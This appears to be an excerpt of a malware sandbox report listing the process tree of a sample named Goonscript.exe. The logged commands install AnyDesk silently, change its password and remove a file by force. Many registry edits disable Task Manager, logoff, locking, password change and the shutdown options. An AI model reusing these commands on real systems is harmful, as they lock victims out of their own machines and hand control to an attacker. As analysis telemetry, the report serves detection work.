| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\2aazV5.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2340 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4832 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4056 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=4940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5608 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6184 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1960 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5424 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6636 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\2C5A.tmp\2C5B.tmp\2C5C.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30BF.tmp\30C0.tmp\30C1.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Users\Admin\Downloads\Goonscript.exe
"C:\Users\Admin\Downloads\Goonscript.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\367C.tmp\367D.tmp\367E.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3AA3.tmp\3AA4.tmp\3AA5.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7684 /prefetch:1
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --control
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3e0 0x2f4
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A1.tmp\71A2.tmp\71A3.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb31e746f8,0x7ffb31e74708,0x7ffb31e74718
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8085.tmp\8086.tmp\8087.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
